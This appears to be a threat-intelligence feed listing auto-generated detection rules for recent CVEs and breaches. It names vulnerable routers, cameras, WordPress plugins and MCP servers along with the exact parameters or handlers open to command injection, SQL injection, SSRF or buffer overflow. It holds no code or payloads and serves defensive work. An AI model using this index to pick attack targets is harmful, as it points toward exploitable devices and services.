🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7211: dvladimirov MCP Command Injection Vulnerab...
🛡️ 1 more rules via /detect
CVE-2026-7206: SQL Injection via extract_to_json output_filename parameter
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7206: sqlite-mcp SQL Injection Vulnerability Exp...
🛡️ 2 more rules via /detect
CVE-2026-7205: Path Traversal in duartium papers-mcp-server search_papers
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7205: High-Severity Path Traversal in duartium p...
🛡️ 1 more rules via /detect
CVE-2026-7204 - Totolink A8000RU Command Injection via setPptpServerCfg
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink A8000RU Critical Command Injection (CVE-2026-7204)
🛡️ 2 more rules via /detect
CVE-2026-7203 - Totolink A8000RU OS Command Injection via setUrlFilterRules
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink A8000RU Critical OS Command Injection (CVE-2026-...
🛡️ 1 more rules via /detect
CVE-2026-7202 Totolink A8000RU OS Command Injection via setWiFiWpsStart
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink A8000RU Critical OS Command Injection (CVE-2026-...
🛡️ 1 more rules via /detect
CVE-2026-32644 - Milesight AIOT Camera Default SSL Key Usage
🌐 NVDT1190 — Initial Access
Auto-generated from Milesight AIOT Cameras Critical Vulnerability: Default SS...
🛡️ 2 more rules via /detect
CVE-2026-20766 - Milesight AIOT Camera Out-of-Bounds Memory Access
🌐 NVDT1190 — Initial Access
Auto-generated from Milesight AIOT Cameras Vulnerable to Out-of-Bounds Memory...
🛡️ 2 more rules via /detect
CVE-2026-7199: SQL Injection in Pharmacy System ajax.php delete_product action
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7199: SQL Injection in Pharmacy Sales and Invent...
🛡️ 2 more rules via /detect
OpenClaw chat.send Privilege Escalation - CVE-2026-41371
🌐 NVDT1068 — Privilege Escalation
Auto-generated from OpenClaw Privilege Escalation (CVE-2026-41371) Allows Ses...
🛡️ 1 more rules via /detect
CVE-2026-41364: OpenClaw SSH Sandbox Tar Upload Symlink Exploit
🌐 NVDT1570 — Execution
Auto-generated from CVE-2026-41364: OpenClaw Symlink Vulnerability Allows Arb...
🛡️ 2 more rules via /detect
CVE-2026-40976: Spring Boot Default Security Bypass - Unauthenticated Access to Actuator Endpoints
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-40976: Spring Boot Default Security Bypass Expos...
🛡️ 2 more rules via /detect
CVE-2026-40973: Spring Boot Local Temp Directory Takeover
🌐 NVDT1574.002 — Persistence
Auto-generated from Spring Boot CVE-2026-40973: Local Attacker Can Hijack Ses...
🛡️ 2 more rules via /detect
Spring Boot DevTools Remote Secret Timing Attack - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-40972: Spring Boot DevTools Timing Attack Expose...
🛡️ 2 more rules via /detect
CVE-2026-27785: Milesight Camera Hardcoded Credentials Login Attempt
🌐 NVDT1110 — Credential Access
Auto-generated from CVE-2026-27785: Milesight AIOT Cameras Exposed by Hardcod...
🛡️ 2 more rules via /detect
CVE-2026-28747 - Milesight AIOT Camera Authorization Bypass via Weak Key Generation
🌐 NVDT1190 — Initial Access
Auto-generated from Milesight AIOT Cameras Vulnerable to Authorization Bypass...
🛡️ 2 more rules via /detect
Pitney Bowes Data Breach - ShinyHunters Leak
Breach IntelT1119 — Collection
Auto-generated from Pitney Bowes Data Breach: ShinyHunters Leaks 8.2M Records
🛡️ 2 more rules via /detect
CVE-2026-7178: NextChat Artifacts Endpoint SSRF via storeUrl
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7178: ChatGPTNextWeb NextChat SSRF Vulnerability
🛡️ 2 more rules via /detect
CVE-2026-7177 - ChatGPTNextWeb NextChat SSRF via proxyHandler
🌐 NVDT1190 — Initial Access
Auto-generated from ChatGPTNextWeb NextChat SSRF Vulnerability (CVE-2026-7177...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7160
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda HG3 Router Command Injection (CVE-2026-7160) Expose...
🛡️ 2 more rules via /detect
CVE-2026-7159: mkdocs-mcp-plugin Path Traversal Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7159: douinc mkdocs-mcp-plugin Path Traversal Vu...
🛡️ 2 more rules via /detect
CVE-2026-7191: qnabot-on-aws Content Designer RCE via Prototype Manipulation
🌐 NVDT1574.002 — Execution
Auto-generated from CVE-2026-7191: qnabot-on-aws Admin RCE via Prototype Mani...
🛡️ 2 more rules via /detect
CVE-2026-7158: dmitryglhf mcp-url-downloader SSRF via _validate_url_safe
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7158: dmitryglhf mcp-url-downloader SSRF Vulnera...
🛡️ 2 more rules via /detect
CVE-2026-7157: Aider-MCP-Server Command Injection via relative_editable_files
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7157: Aider-MCP-Server Command Injection Vulnera...
🛡️ 1 more rules via /detect
CVE-2026-7156 Totolink A8000RU OS Command Injection via CGI Handler
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink A8000RU Critical OS Command Injection (CVE-2026-...
🛡️ 1 more rules via /detect
CVE-2026-7155 Totolink A8000RU Command Injection via setLoginPasswordCfg
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink A8000RU Faces Critical Remote Command Injection ...
🛡️ 1 more rules via /detect
CVE-2026-7154 Totolink A8000RU OS Command Injection via tty_server
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink A8000RU Critical OS Command Injection (CVE-2026-...
🛡️ 1 more rules via /detect
CVE-2026-7153: OS Command Injection via setMiniuiHomeInfoShow in Totolink Router
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-7153: Critical OS Command Injection in Totolink ...
🛡️ 2 more rules via /detect
CVE-2026-7152 Totolink A8000RU Command Injection via setTelnetCfg
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink A8000RU Critical Command Injection (CVE-2026-7152)
🛡️ 1 more rules via /detect
CVE-2026-7151 Tenda HG3 2.0 Remote Stack Buffer Overflow via formUploadConfig
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda HG3 2.0 Router Vulnerability: Remote Stack Buffer O...
🛡️ 2 more rules via /detect
CVE-2026-6741: WordPress LatePoint Plugin User Linking
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6741: WordPress LatePoint Plugin Privilege Escal...
🛡️ 1 more rules via /detect
Supply Chain Compromise: elementary-data v0.23.3 Malicious Package
Breach IntelT1190 — Initial Access
Auto-generated from elementary-data Python Library Compromised with Infostealer
🛡️ 2 more rules via /detect
CVE-2026-7149: Dexhunter Kaggle-MCP Path Traversal Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7149: Dexhunter Kaggle-MCP Path Traversal Vulner...
🛡️ 2 more rules via /detect
CVE-2026-7147: mcp-chat-studio LLM API SSRF via base_url parameter
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7147: JoeCastrom mcp-chat-studio SSRF Vulnerabil...
🛡️ 2 more rules via /detect
CVE-2026-7146: mcp-data-vis SSRF via axios in web-scraper
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7146: AlejandroArciniegas mcp-data-vis Vulnerabl...
🛡️ 2 more rules via /detect
CVE-2025-69689 - Fan Control App V251 Privilege Escalation via Open File Dialog
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Fan Control App V251 Privilege Escalation (CVE-2025-69689)
🛡️ 1 more rules via /detect
CVE-2026-7140: OS Command Injection via cstecgi.cgi on Totolink Routers
🌐 NVDT1059.004 — Initial Access
Auto-generated from CVE-2026-7140: Critical OS Command Injection in Totolink ...
🛡️ 2 more rules via /detect
CVE-2026-7138: Totolink Router NTP Command Injection
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7138: Critical Command Injection in Totolink Rou...
🛡️ 2 more rules via /detect
CVE-2026-7137 Totolink Router RCE via setStorageCfg - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink Router RCE: CVE-2026-7137 Exposes Home and Small...
🛡️ 2 more rules via /detect
CVE-2026-7136 - Totolink A8000RU DMZ Command Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink A8000RU Critical Command Injection Flaw (CVE-202...
🛡️ 2 more rules via /detect
CVE-2026-41463 ProjeQtor Plugin Upload RCE via ZipSlip
🌐 NVDT1190 — Initial Access
Auto-generated from ProjeQtor ZipSlip Flaw: Authenticated RCE via Plugin Upload
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-41462
🌐 NVDT1190 — Initial Access
Auto-generated from ProjeQtor Critical SQL Injection Flaw Exposes Sensitive Data
🛡️ 3 more rules via /detect
CVE-2026-30352: RCE via /devserver/start endpoint command injection
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-30352: Critical RCE in leonvanzyl autocoder /dev...
🛡️ 2 more rules via /detect
CVE-2026-30351: Path Traversal in autocoder UI
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-30351: Path Traversal Hits leonvanzyl autocoder
🛡️ 1 more rules via /detect
ClickUp API Key Exposure - Potential Data Exfiltration
Breach IntelT1537 — Impact
Auto-generated from ClickUp API Key Exposed for Over a Year, Exposing Custome...
🛡️ 2 more rules via /detect
PhantomRPC Privilege Escalation Attempt
Breach IntelT1068 — Privilege Escalation
Auto-generated from Windows 'PhantomRPC' Flaw Enables Privilege Escalation
🛡️ 2 more rules via /detect
Spamouflage Disinformation Campaign Targeting Tibetan Parliament-in-Exile
Breach IntelT1566.001 — Initial Access
Auto-generated from Spamouflage Disinformation Campaign Targets Tibetan Parli...
🛡️ 2 more rules via /detect
CVE-2026-7131: SQL Injection in Online Lot Reservation System Login
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7131: SQL Injection in Online Lot Reservation Sy...
🛡️ 2 more rules via /detect
Checkmarx GitHub Data Exfiltration via Unusual Git Activity
Breach IntelT1041 — Exfiltration
Auto-generated from Checkmarx GitHub Data Leaked Post Supply Chain Attack
🛡️ 2 more rules via /detect
CVE-2026-7130: SQL Injection in Pharmacy System ajax.php delete_category
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7130: Critical SQL Injection Flaw in Pharmacy Sy...
🛡️ 2 more rules via /detect
CVE-2026-7128: SQL Injection in SourceCodester Pharmacy System ajax.php
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7128: SQL Injection in SourceCodester Pharmacy S...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7127
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7127: SQL Injection in Pharmacy System Exposes S...
🛡️ 3 more rules via /detect
CVE-2026-7126: SQL Injection in Pharmacy System ajax.php
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7126: SQL Injection in Pharmacy Sales and Invent...
🛡️ 2 more rules via /detect
Medtronic Data Exfiltration via Unusual DNS Queries
Breach IntelT1071.004 — Exfiltration
Auto-generated from Medtronic Confirms Data Breach After Hackers Claim 9 Mill...
🛡️ 2 more rules via /detect
Microsoft Teams Impersonation - Suspicious Executable Download
Breach IntelT1566.002 — Initial Access
Auto-generated from Microsoft Teams Impersonation Leads to Corporate Network ...
🛡️ 2 more rules via /detect
CVE-2026-7125 - Totolink A8000RU OS Command Injection via setWiFiEasyCfg
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink A8000RU Critical OS Command Injection (CVE-2026-...
🛡️ 1 more rules via /detect
CVE-2026-7124: OS Command Injection via setIpv6LanCfg on Totolink Routers
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-7124: Critical OS Command Injection in Totolink ...
🛡️ 2 more rules via /detect
CVE-2026-7123: Totolink Router Command Injection via setIptvCfg
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7123: Critical Command Injection in Totolink Rou...
🛡️ 2 more rules via /detect
APT28 Exploitation of Incomplete Windows Patch - Initial Access
Breach IntelT1190 — Initial Access
Auto-generated from Microsoft Windows Patch Incomplete, APT28 Exploits Zero-C...
🛡️ 2 more rules via /detect
ICE Graphite Zero-Click Spyware Deployment
Breach IntelT1059.003 — Execution
Auto-generated from US ICE Deploys Israeli Graphite Zero-Click Spyware Agains...
🛡️ 2 more rules via /detect
CVE-2026-7122 - Totolink A8000RU CGI Handler Command Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink A8000RU Critical Command Injection (CVE-2026-7122)
🛡️ 1 more rules via /detect
CVE-2026-7121 Totolink A8000RU CGI Command Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink A8000RU Critical Command Injection (CVE-2026-712...
🛡️ 1 more rules via /detect
Tenda HG3 OS Command Injection via formCountrystr - CVE-2026-7119
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda HG3 Router OS Command Injection (CVE-2026-7119)
🛡️ 1 more rules via /detect
CVE-2026-5943 - Document Object Model Corruption Attempt
🌐 NVDT1204.002 — Execution
Auto-generated from CVE-2026-5943: High-Severity Memory Corruption Vulnerabil...
🛡️ 2 more rules via /detect
CVE-2026-5941: Malformed Form Field Hierarchy Processing - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-5941: Parsing Flaws Lead to Memory Corruption
🛡️ 2 more rules via /detect
CVE-2026-5940 - Program Crash via UI Refresh After Comment Removal
🌐 NVDT1204.002 — Execution
Auto-generated from CVE-2026-5940: UI Refresh Flaw Triggers Program Crashes
🛡️ 2 more rules via /detect
Mozilla Firefox Large Vulnerability Patching Event
Breach IntelT1190 — Initial Access
Auto-generated from Mozilla Firefox Fixes 271 Vulnerabilities Using AI Model
🛡️ 2 more rules via /detect
PhantomCore Exploitation of TrueConf Vulnerabilities
Breach IntelT1190 — Initial Access
Auto-generated from PhantomCore Exploits TrueConf Vulnerabilities in Russian ...
🛡️ 2 more rules via /detect
Medtronic Internal System Access - Suspicious Process Execution
Breach IntelT1059.003 — Execution
Auto-generated from Medtronic Reports Internal System Access by Unauthorized ...
🛡️ 2 more rules via /detect
CVE-2026-22337 - Directorist Social Login Privilege Escalation Attempt
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Directorist Social Login Flaw CVE-2026-22337 Exposes Crit...
🛡️ 2 more rules via /detect
CVE-2026-22336 - Directorist Booking SQL Injection Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Directorist Booking SQL Injection Flaw Exposes Critical Data
🛡️ 2 more rules via /detect
Apache MINA Deserialization Bypass Attempt (CVE-2026-41409)
🌐 NVDT1190 — Initial Access
Auto-generated from Apache MINA Deserialization Vulnerability: CVE-2026-41409...
🛡️ 2 more rules via /detect
Free Tier - Cambodian Senator Sanctioned - Financial Transaction Monitoring
Breach IntelT1566.001 — Initial Access
Auto-generated from US Cracks Down on Southeast Asia Cyberscams, Sanctions Ca...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7101
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F456 Router Buffer Overflow (CVE-2026-7101) Allows ...
🛡️ 2 more rules via /detect
CVE-2026-7100: Tenda F456 Router Natlimitof Buffer Overflow Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7100: Tenda F456 Router Vulnerability Allows Rem...
🛡️ 1 more rules via /detect
Tenda F456 Router QuickIndex Buffer Overflow Attempt (CVE-2026-7099)
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F456 Router Vulnerability (CVE-2026-7099) Exposes N...
🛡️ 1 more rules via /detect
CVE-2026-7098 Tenda F456 Router Remote Buffer Overflow via DhcpListClient
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F456 Router Vulnerable to Remote Buffer Overflow (C...
🛡️ 1 more rules via /detect
CVE-2026-42379 - Templately Sensitive Data Exposure via URI Query
🌐 NVDT1190 — Initial Access
Auto-generated from WPDeveloper Templately Vulnerability Exposes Sensitive Data
🛡️ 2 more rules via /detect
CVE-2026-41635: Apache MINA IoBuffer.getObject() RCE Attempt
🌐 NVDT1505.003 — Initial Access
Auto-generated from CVE-2026-41635: Critical Apache MINA RCE bypasses allowlist
🛡️ 2 more rules via /detect
Firefox CVE-2026-6770 Tor User Fingerprinting Attempt
Breach IntelT1056.001 — Collection
Auto-generated from Firefox Vulnerability CVE-2026-6770 Allows Tor User Finge...
🛡️ 2 more rules via /detect
CVE-2026-7097 - Tenda F456 Remote Buffer Overflow via webExcptypemanFilter
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F456 Router Vulnerability: Remote Buffer Overflow (...
🛡️ 1 more rules via /detect
CVE-2026-7096: Tenda HG3 OS Command Injection via formgponConf
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7096: Tenda HG3 Router OS Command Injection
🛡️ 1 more rules via /detect
ShinyHunters Data Exfiltration via Web Server - ADT Breach
Breach IntelT1119 — Collection
Auto-generated from ADT Home Security Breach Exposes 5.5M Records to ShinyHun...
🛡️ 2 more rules via /detect
CVE-2026-7094: SSRF via puppeteer_navigate url parameter
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7094: High-Severity SSRF in ShadowCloneLabs Glut...
🛡️ 2 more rules via /detect
Free Tier - Alibaba Data Exposure of UK Medical Volunteers
Breach IntelT1537 — Exfiltration
Auto-generated from UK Medical Data of 500,000 Volunteers Listed on Alibaba
🛡️ 3 more rules via /detect
Fake CAPTCHA SMS Fraud - Suspicious URI Query
Breach IntelT1190 — Initial Access
Auto-generated from Fake CAPTCHA Scams Exploit Users for International SMS Fraud
🛡️ 2 more rules via /detect
Phishing Campaign Impersonating LiveDNS - Malicious Domain Access
Breach IntelT1566.002 — Initial Access
Auto-generated from Phishing Campaign Impersonates LiveDNS to Steal Credit Ca...
🛡️ 2 more rules via /detect
CVE-2026-7088: SQL Injection in Pharmacy System ajax.php
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7088: SQL Injection in Pharmacy System Exposes S...
🛡️ 2 more rules via /detect
CVE-2026-7087: SourceCodester Pharmacy System SQLi via ajax.php
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7087: SourceCodester Pharmacy System SQLi Puts D...
🛡️ 2 more rules via /detect
Udemy Data Breach - ShinyHunters Data Publication
Breach IntelT1566.002 — Initial Access
Auto-generated from Udemy Breach: ShinyHunters Leaks User Data, Email, Addres...
🛡️ 2 more rules via /detect
CVE-2026-7082 Tenda F456 Buffer Overflow via formWrlExtraSet
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F456 Buffer Overflow (CVE-2026-7082) Allows Remote ...
🛡️ 1 more rules via /detect
CVE-2026-7081 Tenda F456 Router Buffer Overflow via GstDhcpSetSer
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F456 Router: Critical Buffer Overflow (CVE-2026-708...
🛡️ 1 more rules via /detect
CVE-2026-7106: WordPress Custom Role Manager Privilege Escalation via Profile Update
🌐 NVDT1078.004 — Privilege Escalation
Auto-generated from CVE-2026-7106: WordPress Plugin Privilege Escalation Expo...
🛡️ 1 more rules via /detect
CVE-2026-7080: Tenda F456 PPTPUserSetting Buffer Overflow Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F456 Router Vulnerability: Remote Buffer Overflow E...
🛡️ 1 more rules via /detect
Tenda F456 Router Buffer Overflow - CVE-2026-7079
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F456 Router Buffer Overflow (CVE-2026-7079) Exposes...
🛡️ 1 more rules via /detect
CVE-2026-7078: Tenda F456 Router SetIpBind Buffer Overflow Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7078: Tenda F456 Router Buffer Overflow Exposes ...
🛡️ 1 more rules via /detect
CVE-2026-7077: itsourcecode Courier Management SQLi via edit_parcel.php
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7077: itsourcecode Courier Management System SQL...
🛡️ 2 more rules via /detect
CVE-2026-3006 - Kernel Race Condition Privilege Escalation Attempt
🌐 NVDT1068 — Privilege Escalation
Auto-generated from CVE-2026-3006: Kernel Race Condition Leads to Local Privi...
🛡️ 1 more rules via /detect
SQL Injection in itSourceCode Courier Management System - CVE-2026-7076
🌐 NVDT1190 — Initial Access
Auto-generated from itSourceCode Courier Management System SQLi: CVE-2026-7076
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7075
🌐 NVDT1190 — Initial Access
Auto-generated from itsourcecode Construction Management System SQLi (CVE-202...
🛡️ 3 more rules via /detect
CVE-2026-7074: SQL Injection in Construction Management System /execute1.php
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7074: SQL Injection in Construction Management S...
🛡️ 2 more rules via /detect
CVE-2026-7073 - itsourcecode Construction Management SQLi via execute.php
🌐 NVDT1190 — Initial Access
Auto-generated from itsourcecode Construction Management System SQLi: CVE-202...
🛡️ 2 more rules via /detect
CVE-2026-7072: CodePanda Canteen Management SQLi via Login Username
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7072: CodePanda Source Canteen Management System...
🛡️ 2 more rules via /detect
CVE-2026-7070: SQL Injection in Inventory Management System Login Username
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7070: High-Severity SQLi in Inventory Management...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7069
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7069: D-Link DIR-825 Vulnerability Exposes End-o...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7068
🌐 NVDT1190 — Initial Access
Auto-generated from D-Link DIR-825 Vulnerability (CVE-2026-7068) Leads to Buf...
🛡️ 2 more rules via /detect
CVE-2026-7067 D-Link DIR-822 Command Injection in udhcpd Hostname
🌐 NVDT1190 — Initial Access
Auto-generated from D-Link DIR-822 A_101 Command Injection (CVE-2026-7067) in...
🛡️ 1 more rules via /detect
CVE-2026-7066: OS Command Injection in simple-openstack-mcp server.py
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-7066: choieastsea simple-openstack-mcp OS Comman...
🛡️ 2 more rules via /detect
CVE-2026-7065: BidingCC BuildingAI Remote Upload SSRF Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7065: BidingCC BuildingAI SSRF Vulnerability Pub...
🛡️ 2 more rules via /detect
CVE-2026-42363: GeoVision GV-IP Device Utility Broadcast Credential Leak
🌐 NVDT1595.002 — Reconnaissance
Auto-generated from CVE-2026-42363: GeoVision GV-IP Device Utility Critical C...
🛡️ 2 more rules via /detect
Suspicious Shell Command Execution
🌐 NVDT1059.004 — Execution
Auto-generated from LogonTracer OS Command Injection Poses High Risk
Web Application Exploitation Attempt — CVE-2026-7064
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7064: AgentDeskAI Browser Tool Suffers OS Comman...
🛡️ 2 more rules via /detect
CVE-2026-7063: Employee Management System SQL Injection via pwd parameter
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7063: Employee Management System SQL Injection P...
🛡️ 2 more rules via /detect
CVE-2026-7062 - Intina47 Context-Sync OS Command Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Intina47 Context-Sync OS Command Injection (CVE-2026-7062)
🛡️ 2 more rules via /detect
Udemy Data Breach - ShinyHunters Extortion Attempt
Breach IntelT1190 — Initial Access
Auto-generated from Udemy Data Breach: 1.4M Accounts Exposed by ShinyHunters
🛡️ 2 more rules via /detect
CVE-2026-7061: Toowiredd chatgpt-mcp-server OS Command Injection via docker.service.ts
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7061: Toowiredd chatgpt-mcp-server Vulnerable to...
🛡️ 2 more rules via /detect
CVE-2026-7060: SQL Injection in liyupi yu-picture sortField parameter
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7060: High-Severity SQL Injection in liyupi yu-p...
🛡️ 2 more rules via /detect
CVE-2026-7058: MiroFish SimulationIPCClient Command Injection
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7058: MiroFish IPC Vulnerability Enables Remote ...
🛡️ 2 more rules via /detect
CVE-2026-7057 Tenda F456 HTTP Daemon Remote Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F456 Vulnerability: Remote Buffer Overflow in HTTP ...
🛡️ 1 more rules via /detect
CVE-2026-7056 - Tenda F456 Router Remote Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F456 Router: Remote Buffer Overflow (CVE-2026-7056)...
🛡️ 1 more rules via /detect
Tenda F456 Router Buffer Overflow - CVE-2026-7055
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F456 Router Buffer Overflow (CVE-2026-7055) Exposes...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7054
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7054: Tenda F456 Router Buffer Overflow Critical...
🛡️ 2 more rules via /detect
Tenda F456 Router Vulnerability CVE-2026-7053 - Buffer Overflow Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F456 Router Vulnerability (CVE-2026-7053) Exposes B...
🛡️ 1 more rules via /detect
CVE-2026-7042: MiroFish REST API Unauthenticated create_app Access
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7042: MiroFish REST API Lacks Authentication, Hi...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2018-25294
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2018-25294: CEWE Photoshow Buffer Overflow DoS
🛡️ 2 more rules via /detect
CVE-2018-25283 - iSmartViewPro SEH Buffer Overflow - Local Code Execution
🌐 NVDT1204.002 — Execution
Auto-generated from iSmartViewPro 1.5 SEH Buffer Overflow Allows Local Code E...
🛡️ 1 more rules via /detect
CVE-2018-25263 - Faleemi Desktop Software Local Buffer Overflow SEH Overwrite
🌐 NVDT1204.002 — Execution
Auto-generated from Faleemi Desktop Software 1.8.2 Suffers High-Severity Buff...
🛡️ 2 more rules via /detect
Detect Firefox/Thunderbird Memory Corruption Exploit Attempt - CVE-2026-6786
🌐 NVDT1203 — Initial Access
Auto-generated from Firefox, Thunderbird Patches Address High-Severity Memory...
🛡️ 2 more rules via /detect
CVE-2026-6785: Potential Firefox/Thunderbird RCE via Memory Corruption
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6785: Firefox & Thunderbird Memory Safety Bugs A...
🛡️ 2 more rules via /detect
France Titres Data Exfiltration via Dark Web Forum
Breach IntelT1048 — Exfiltration
Auto-generated from France Titres (ANTS) Confirms Major Data Breach Affecting...
🛡️ 2 more rules via /detect
CVE-2026-7039: tufantunc ssh-mcp Local Command Injection
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-7039: tufantunc ssh-mcp Local Command Injection ...
🛡️ 2 more rules via /detect
CVE-2026-7037: Totolink A8000RU OS Command Injection via pptpPassThru
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7037: Totolink A8000RU Critical OS Command Injec...
🛡️ 1 more rules via /detect
Tenda i9 Path Traversal Attempt (CVE-2026-7036)
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda i9 Path Traversal (CVE-2026-7036) Exposes Networks ...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7035
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda FH1202 Router Vulnerability (CVE-2026-7035) Exposes...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7034
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7034: Tenda FH1202 Router Hit by High-Severity B...
🛡️ 2 more rules via /detect
CVE-2026-7033 Tenda F456 Buffer Overflow via SafeClientFilter
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F456 Buffer Overflow (CVE-2026-7033) Exposes Routers
🛡️ 1 more rules via /detect
CVE-2026-7032: Tenda F456 Router SafeEmailFilter Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7032: Tenda F456 Router Buffer Overflow Exploite...
🛡️ 1 more rules via /detect
El Al Phishing Campaign - Malicious File Download
Breach IntelT1566.002 — Initial Access
Auto-generated from El Al Phishing Campaign Spreads Malware, National Cyber D...
🛡️ 2 more rules via /detect
Tenda F456 SafeMacFilter Buffer Overflow Attempt - CVE-2026-7031
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F456 Buffer Overflow (CVE-2026-7031) Publicly Explo...
🛡️ 1 more rules via /detect
CVE-2026-7030: Tenda F456 RouteStatic Buffer Overflow Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7030: Tenda F456 Router Buffer Overflow Exposes ...
Web Application Exploitation Attempt — CVE-2026-7029
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7029: Tenda F456 Buffer Overflow Exposes Routers...
🛡️ 2 more rules via /detect
GitHub Employee Token Used in Cloud Environment - Critical
Breach IntelT1078.004 — Initial Access
Auto-generated from GitHub Employee Token Exposed: Thousands of Secrets in Cl...
🛡️ 2 more rules via /detect
CVE-2026-7025 - Typecho Pingback SSRF
🌐 NVDT1190 — Initial Access
Auto-generated from Typecho SSRF Vulnerability (CVE-2026-7025) Publicly Explo...
🛡️ 2 more rules via /detect
CVE-2026-7022: SmythOS Improper Authentication via X-DEBUG Headers
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7022: SmythOS Improper Authentication Vulnerabil...
🛡️ 1 more rules via /detect
Tenda F456 Router P2pListFilter Buffer Overflow Attempt (CVE-2026-7019)
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F456 Router Vulnerability (CVE-2026-7019) Exposes N...
